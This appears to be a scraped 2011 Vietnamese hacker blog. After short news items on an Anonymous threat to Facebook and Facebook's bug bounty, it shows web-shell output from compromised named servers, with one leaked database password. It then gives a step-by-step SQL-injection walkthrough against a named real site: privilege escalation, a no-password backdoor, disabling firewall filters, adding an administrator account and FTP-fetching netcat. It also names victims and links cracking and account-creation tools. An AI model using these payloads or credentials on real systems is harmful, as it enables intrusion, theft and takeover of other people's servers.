Nguồn : wWw.VanLinhEX.Com
Thực chất ngày này cũng chẳng có gì đặc biệt ngoài mấy con số "1"!
À còn , tối nay trên Bà Rịa nghe nói có bắn pháo hoa mừng 20 năm thành lập tỉnh BRVT . Chắc lại lôi kéo mấy thằng lượn lên đó chơi xem pháo hoa .
Ghé xem lịch thi đấu bóng đá Sea Game 26 , thấy ghi 12/11 VN mới đá mà mấy hôm nay nhiều thằng lại cứ nói 11/11 đá , chả hiểu sao !Vào lúc 11 giờ 11 phút 11 giây ngày 11 tháng 11 năm 2011 , Teenvungtau.com và Ketnoivungtau.com
đua nhau comeback Lên search dc cái Trailer 11-11-11 :
Lên xem linh tinh thấy 11-11-11 là 6 cây nến trên quan tài , lại vào ngày thứ 6 . Nhắc đến thứ 6 lại nhớ đến cái ngày u ám mà đúng thứ 6 ngày 13 cách đây 2-3 năm gì đó , xui khỏi bàn luôn :(
Giải trí 1 chút - 11 sự thật đặc biệt về ngày 11-11-11 :
Facebook đã "bình yên vô sự" trong ngày 5/11 và Anthony, người bị nhóm tin tặc Anonymous khẳng định là tác giả của lời đe dọa, thanh minh rằng cậu đã bị lợi dụng.Trong e-mail gửi tới trang công nghệ CNet, Anthony cho hay cậu không phải là tác giả của chiến dịch Operation Facebook (OpFacebook) mà chỉ tạo ra trang OpFacebook trên mạng xã hội này nhằm cập nhật những thông tin tìm kiếm được từ các nguồn khác nhau.
Anthony tin cậu bị lợi dụng vì Anonymous không thể tấn công Facebook.
Hacker này cho biết cách đây 10 tháng, nhiều trang cá nhân (page) biến mất khỏi site Facebook.com mà không có bất kỳ lời cảnh báo hay lý do nào. Sau đó rộ tin đồ Anonymous sắp tiến hành chiến dịch #Op đối với Facebook.
"Vì thế, tôi lập trang web để cung cấp thông tin liên quan về diễn biến sự việc. Tôi săn tin trên các kênh IRC, trang cá nhân của thành viên Anonymous và nói chuyện riêng với vài người trên IRC", Anthony giải thích. "Vài ngày trước, tôi nhận được e-mail từ một người có biệt danh lulz kitty KaptainMeow nói họ biết tôi đứng đằng sau âm mưu tấn công. Dù tôi từ chối, họ chỉ cười và nói rằng tôi có một ngày để tuyên bố chiến dịch #Op không có thực, nếu không họ sẽ trả đũa tôi".
Anthony khẳng định cậu "đã bị lợi dụng để trở thành kẻ giơ đầu chịu báng" sau khi nhóm Anonymous nhận ra họ không thể thực sự đánh sập Facebook.
Anthony cho hay cậu đúng là nhân vật được nhắc đến trong thông báo của nhóm Anonymous trên trang Pastebin nhưng không còn sống tại địa chỉ được nêu.
Châu An
ICTnews – Facebook thông báo sẽ trao 500 USD cho mỗi thông báo lỗi trên website, thấp hơn nhiều so với các khoản thưởng tương đương của Google hay Microsoft.
“Nhằm thể hiện sự cảm kích tới các nhà nghiên cứu bảo mật, chúng tôi đưa ra mức tiền thưởng đối với một số lỗi bảo mật nhất định”, Facebook viết trên một trang có tên “ Security Bug Bounty ”.
Để hội đủ điều kiện nhận tiền thưởng, bạn phải là người đầu tiên báo cáo sự cố bảo mật, và các lỗi phải có nguồn gốc từ Facebook (không phải từ bên thứ 3 như FarmVille). Hơn nữa, các tiết lộ này phải có “trách nhiệm” và cần cung cấp cho Facebook một khoảng thời gian hợp lí trước khi lỗi chính thức công khai, vì các nhà nghiên cứu bảo mật thường xuyên cảnh báo người dùng thông qua blog.
Mặc dù 500 USD là mức cơ bản, nhưng khá mờ nhạt khi so với các công ty khác như khoản thưởng hơn 3.000 USD của Google, 3.000 USD của Mozilla hay 250.000 USD của Microsoft. Nếu bạn đang tìm kiếm một khoản lương hưu sớm, Hiệp hội Phần mềm doanh nghiệp cho biết những ai thông báo về việc sử dụng phần mềm không bản quyền bất hợp pháp sẽ được trả tới 1 triệu USD.
Tuy nhiên, một chuyên gia tại ComputerWorld cho rằng việc phát hiện lỗi bảo mật Facebook có thể giúp các nhà nghiên cứu bảo mật ghi tên mình vào cộng đồng bảo mật vốn gay go và quyết liệt.
“Khoản tiền có thể nhỏ hơn ở các thị trường khác, nhưng các chương trình như thế này sẽ dẫn tới mối quan hệ tốt hơn với cộng đồng bảo mật và cải thiện dịch vụ bảo mật nhanh hơn nhiều so với chỉ sử dụng một nguồn truyền thống”, HD Moore, giám đốc điều hành Rapid 7 nhận định.
Facebook, cũng như Microsoft và Google, từng thuê các hacker mũ xám (những hacker chuyên xâm nhập trái phép vào các hệ thống và tìm ra những lỗ hổng nhưng không vì mục đích phá hoại hay đòi tiền) trong quá khứ, gần đây nhất là hacker George “Geohot” Hotz nổi tiếng (từng đánh cắp 101 triệu tài khoản người dùng qua mạng lưới PlayStation của Sony)
READ MORE
“Nhằm thể hiện sự cảm kích tới các nhà nghiên cứu bảo mật, chúng tôi đưa ra mức tiền thưởng đối với một số lỗi bảo mật nhất định”, Facebook viết trên một trang có tên “ Security Bug Bounty ”.
Để hội đủ điều kiện nhận tiền thưởng, bạn phải là người đầu tiên báo cáo sự cố bảo mật, và các lỗi phải có nguồn gốc từ Facebook (không phải từ bên thứ 3 như FarmVille). Hơn nữa, các tiết lộ này phải có “trách nhiệm” và cần cung cấp cho Facebook một khoảng thời gian hợp lí trước khi lỗi chính thức công khai, vì các nhà nghiên cứu bảo mật thường xuyên cảnh báo người dùng thông qua blog.
Mặc dù 500 USD là mức cơ bản, nhưng khá mờ nhạt khi so với các công ty khác như khoản thưởng hơn 3.000 USD của Google, 3.000 USD của Mozilla hay 250.000 USD của Microsoft. Nếu bạn đang tìm kiếm một khoản lương hưu sớm, Hiệp hội Phần mềm doanh nghiệp cho biết những ai thông báo về việc sử dụng phần mềm không bản quyền bất hợp pháp sẽ được trả tới 1 triệu USD.
Tuy nhiên, một chuyên gia tại ComputerWorld cho rằng việc phát hiện lỗi bảo mật Facebook có thể giúp các nhà nghiên cứu bảo mật ghi tên mình vào cộng đồng bảo mật vốn gay go và quyết liệt.
“Khoản tiền có thể nhỏ hơn ở các thị trường khác, nhưng các chương trình như thế này sẽ dẫn tới mối quan hệ tốt hơn với cộng đồng bảo mật và cải thiện dịch vụ bảo mật nhanh hơn nhiều so với chỉ sử dụng một nguồn truyền thống”, HD Moore, giám đốc điều hành Rapid 7 nhận định.
Facebook, cũng như Microsoft và Google, từng thuê các hacker mũ xám (những hacker chuyên xâm nhập trái phép vào các hệ thống và tìm ra những lỗ hổng nhưng không vì mục đích phá hoại hay đòi tiền) trong quá khứ, gần đây nhất là hacker George “Geohot” Hotz nổi tiếng (từng đánh cắp 101 triệu tài khoản người dùng qua mạng lưới PlayStation của Sony)
Hum nay 8-11-2011 .
Mình phát hiện 1 lỗi bảo mật của facebook .
cũng chẳng biết là lỗi bình thường hay lỗi chết người .
Nhưng đây cũng là điều mà facebook cần phải đề phòng hơn .
GIới thiệu đôi chút về lỗi :
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'OR player2=) AND (player1='1317722164' OR player2='1317722164') AND gamestate>2 ' at line 1' in /home/sylsft/ssipm.com/facebook/reversi/profile.php:35 Stack trace: #0 /home/sylsft/ssipm.com/facebook/reversi/profile.php(35): PDOStatement->execute() #1 {main} thrown in/home/sylsft/ssipm.com/facebook/reversi/profile.php on line 35
--------------------------------------------------------------------------------------------
READ MORE
Mình phát hiện 1 lỗi bảo mật của facebook .
cũng chẳng biết là lỗi bình thường hay lỗi chết người .
Nhưng đây cũng là điều mà facebook cần phải đề phòng hơn .
GIới thiệu đôi chút về lỗi :
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'OR player2=) AND (player1='1317722164' OR player2='1317722164') AND gamestate>2 ' at line 1' in /home/sylsft/ssipm.com/facebook/reversi/profile.php:35 Stack trace: #0 /home/sylsft/ssipm.com/facebook/reversi/profile.php(35): PDOStatement->execute() #1 {main} thrown in/home/sylsft/ssipm.com/facebook/reversi/profile.php on line 35
Hình ảnh mà mình đã chụp lại:
Đang Kiếm cách exploit để kiếm 500$ từ thằng FB :))
Pro nào có cao kiến pm em nhé :D
Hết
Checked By Wuiluc
--------------------------------------------------------------------------------------------
OS Version : Microsoft Windows NT 5.2.3790 Service Pack 2 - IIS Version : Microsoft-IIS/6.0
System Dir : C:\WINDOWS\system32 - PATH_TRANSLATED : d:\WebHosting\daotnv\xxxxxxxx\xxxxxxxxx.edu.vn\www\wuiluc.aspx
Hardware Info : 4CPU - x86 Family 6 Model 23 Stepping 10, GenuineIntel
Checked By Wuiuc
MeThod: Bypass Form Admin Login
Author : Wuiluc
Ex : 31-10-2011
Show picture :
Total Earnings To Date: $ 110.5797 USD
Amount Paid To Date: $ 0 USD
Amount Transfered To Purchases: $ 15.83 USD
+++++++++++++++++++++++++++++++++++++++
Account Balance:
$86.7382
Purchase Balance:
$9443 [add funds]
+++++++++++++++++++++++++++++++++++++++
Checked By Wuiluc
READ MORE
Author : Wuiluc
Ex : 31-10-2011
Show picture :
Total Earnings To Date: $ 110.5797 USD
Amount Paid To Date: $ 0 USD
Amount Transfered To Purchases: $ 15.83 USD
+++++++++++++++++++++++++++++++++++++++
Account Balance:
$86.7382
Purchase Balance:
$9443 [add funds]
+++++++++++++++++++++++++++++++++++++++
Checked By Wuiluc
Windows NT MB2D6 5.2 build 3790
safe_mode: OFF Open_Basedir: NONE Safe_Exec_Dir: NONE Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: ON PostgreSQL: OFF Oracle: OFF
Disable functions : NONE
Downloaders: fopen
Free space : 129.84 GB Total space: 175.22 GB
Checked By Wuiluc
Software: Microsoft-IIS/6.0. PHP/5.2.7
uname -a: Windows NT WIN-LPVIETNAM 5.2 build 3790
IUSR_minhuvn
Safe-mode: OFF (not secure)
D:\vhosts\minhu.vn\httpdocs\forum\ drwxrwxrwx
Free 31.96 GB of 149.04 GB (21.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Database :
$config['Database']['dbname'] = 'minhuvn';
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;
$config['MasterServer']['username'] = 'administrator';
$config['MasterServer']['password'] = 'simminhu';
Checked By Wuiluc
Safe_mod: OFF - PHP version: 5.2.7 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : dl,exec,shell_exec,system,passthru,popen,pclose,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,escapeshellcmd,escapeshellarg,curl_multi_exec
Uname -a: Windows NT WIN-LPVIETNAM 5.2 build 3790
Server: - id: 0(IUSR_nhatanh) - uid=0 (IUSR_nhatanh) gid=0(IUSR_nhatanh)
Safe_mod: OFF - PHP version: 4.4.9 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : NONE
Uname -a: Linux infong 2.4 #1 SMP Thu Nov 25 01:59:22 UTC 2010 i686 GNU/Linux
Server: Apache - id: 5596453(u38985396) - uid=5596453 (u38985396) gid=600(u38985396)
Checked By Wuiluc
safe_mode: OFF Open_Basedir: NONE Safe_Exec_Dir: NONE Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 4.4.9 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF
Disable functions : passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,apache_note,apache_setenv,closelog,debugger_off,debugger_on,define_syslog_variables,openlog,syslog,popen,pclose
Useful: gcc, lcc, cc, ld, php, perl, python, ruby, make, tar, gzip, bzip, bzip2, nc, locate, suidperl
Downloaders: fopen, wget, fetch, lynx, links, curl, get
Linux pemlinweb01.bottle.com.au 2.4.21-40.ELsmp #1 SMP Thu Feb 2 22:22:39 EST 2006 i686 athlon i386 GNU/Linux
-
linux-gnu
Apache/2.0.46 (Red Hat) FrontPage/5.0.2.2635 mod_mono/1.2.5
uid=126727(d126727) gid=10002(pemcln) groups=10002(pemcln)
/usr/local/pem/vhosts/126727/webspace/httpdocs/community/images ( drwxrwxrwx )
Checked By Wuiluc
READ MORE
PHP version: 4.4.9 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF
Disable functions : passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,apache_note,apache_setenv,closelog,debugger_off,debugger_on,define_syslog_variables,openlog,syslog,popen,pclose
Useful: gcc, lcc, cc, ld, php, perl, python, ruby, make, tar, gzip, bzip, bzip2, nc, locate, suidperl
Downloaders: fopen, wget, fetch, lynx, links, curl, get
Linux pemlinweb01.bottle.com.au 2.4.21-40.ELsmp #1 SMP Thu Feb 2 22:22:39 EST 2006 i686 athlon i386 GNU/Linux
-
linux-gnu
Apache/2.0.46 (Red Hat) FrontPage/5.0.2.2635 mod_mono/1.2.5
uid=126727(d126727) gid=10002(pemcln) groups=10002(pemcln)
/usr/local/pem/vhosts/126727/webspace/httpdocs/community/images ( drwxrwxrwx )
Checked By Wuiluc
Linux erelyx.com 2.6.9-023stab048.6-enterprise #1 SMP Mon Nov 17 19:09:18 MSK 2008 i686 i686 i386 GNU/Linux
Linux 2.6.9-023stab048.6-enterprise
linux-gnu
Apache/2.2.3 (CentOS)
uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
Checked By Wuiluc
READ MORE
Linux 2.6.9-023stab048.6-enterprise
linux-gnu
Apache/2.2.3 (CentOS)
uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
Checked By Wuiluc
# Category:: webapps
# Tested on: Linux Back Track 5
# Google dork:intitle:intext:"Powered by Onepound." inurl:about.php?cid=
Bug :
errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
sql=select ID,ParentID from promenu where ID=9\'
READ MORE
# Tested on: Linux Back Track 5
# Google dork:intitle:intext:"Powered by Onepound." inurl:about.php?cid=
Bug :
errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
sql=select ID,ParentID from promenu where ID=9\'
PHẦN I: CÁC KĨ THUẬT HACK TRONG SQL
• sql-injection
• convert-magic
• cross-database
PHÁT HIỆN LỖI SQL-INJECTION
http://www.company.com/product/price.asp?id=1
select price from product where id=1
http://www.company.com/product/price.asp?id=1’
select price from product where id=1’
Unclosed quotation mark before the character string ‘
http://www.company.com/product/price.asp?id=[...]
KĨ THUẬT CONVERT-MAGIC
http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password
select price from product where id=1 and 1=convert(int,@@version)--sp_password
Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.
'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
• @@servername, db_name(), system_user, ...
• ‘ “ ( )
LỖI CROSS-DATABASE CỦA MS-SQL
use testdatabase
create proc dbo.test as select * from master.dbo.sysxlogins
go
exec test
select * from master.dbo.sysxlogins
• sa == dbo
• db_owner có thể create & design các object của dbo
• SID của proc dbo.test == SID của master.dbo.sysxlogins
LỖI INJECTION CỦA MASTER..SP_MSDROPRETRY
CREATE PROCEDURE sp_MSdropretry
(@tname sysname, @pname sysname)
as
declare @retcode int
/*
** To public
*/
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
NÂNG QUYỀN QUA MASTER..SP_MSDROPRETRY
exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test‘
drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx
• guest == db_owner của database master
PHẦN 2: MINH HỌA HACK SQL
• Khai thác lỗi sql-injection tại nhaxinh.com.vn
• Một số kinh nghiệm khi hack SQL
LỖI SQL-INJECTION TẠI NHAXINH.COM.VN
• dùng “proxy.ia2.marketscore.com:80” ðể tránh bị ghi nhật kí
http://www.nhaxinh.com.vn/FullStory.asp?id=1
http://www.nhaxinh.com.vn/FullStory.asp?id=1’
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\
XÁC ĐỊNH VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH SERVER_NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?
id=1 and 1=convert(int,system_user)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
• user_name(): các member của “sysadmin” được map sang “dbo”
XÁC ĐỊNH MỨC QUYỀN CỦA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
• admin đã disable openrowset/sqloledb, sẽ enable lại sau
ĐƯA GUEST VÀO DB_OWNER CỦA DATABASE MASTER1
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
• Tại sao? guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell
XÁC NHẬN GUEST ĐÃ NẰM TRONG DB_OWNER CỦA DATABASE MASTER CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in('dbo')))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int.
/Including/general.asp, line 840
CÀI CỬA SAU “BUILTIN\ADMINISTRATORS”
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
• login vào database với username là “BUILTIN\ADMINISTRATORS” mà không cần password
TẠI SAO KHÔNG ADD THẲNG USER “NHAXINH” VÀO SYSADMIN?
exec master..sp_addsrvrolemember 'nhaxinh',sysadmin
• Lỗi: Invalid object name ‘XXXX’ khi vấn tin CSDL sau này
ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0—
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'—
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'—
LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')—
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
• set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins,...) trực tiếp, không qua các “system-procedure”
CHÚ Ý KHI CHẠY MASTER..XP_CMDSHELL
• exec master..xp_cmdshell ‘dir c:\’ -- “SQLAgentCmdExec”
• select * from openrowset('sqloledb', 'server=
XÁC ĐỊNH IP CỦA SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == “%”)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
DO THÁM IP “203.162.7.70”
C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
• 203.162.7.70 == panvietnam.com
FTP TRỰC TIẾP - THẤT BẠI !
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == “&”)
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOAD NETCAT LÊN SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == “>”)
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840 .
Soucre : XhackerVN
BUG : vBulletin 4.0.x (Search) SQLi / Cross-Site Request Scripting
Victim : http://itlqdvt.com/forum.php
Link Download : http://www.mediafire.com/?nbp24fjwnq9qjfy
Checked By Wuiluc
READ MORE
Victim : http://itlqdvt.com/forum.php
Link Download : http://www.mediafire.com/?nbp24fjwnq9qjfy
Checked By Wuiluc
Linux vps1d223.vdrs.net 2.6.18-238.5.1.el5 #1 SMP Fri Apr 1 18:42:32 EDT 2011 i686 i686 i386 GNU/Linux
Linux 2.6.18-238.5.1.el5
linux-gnu
Apache/2.2.17 (EL)
uid=48(apache) gid=48(apache) groups=48(apache)
/home/ceogroup/ceogroup.com.vn ( drwxr-xr-x )
Kill Df .
Trương trình phá mã băng DeepFreeze từ phiên bản 6.63 trở xuống .
Rebot ko cần password khi đã dùng trình KillDF crack ..
Download : http://www.mediafire.com/?t4tz554wtnb
READ MORE
Trương trình phá mã băng DeepFreeze từ phiên bản 6.63 trở xuống .
Rebot ko cần password khi đã dùng trình KillDF crack ..
Download : http://www.mediafire.com/?t4tz554wtnb
Sử dụng lệnh hệ thống system để create account và add group administrators ....
donwload : http://www.mediafire.com/?5i2vz4ioj6e7zzg
READ MORE
donwload : http://www.mediafire.com/?5i2vz4ioj6e7zzg
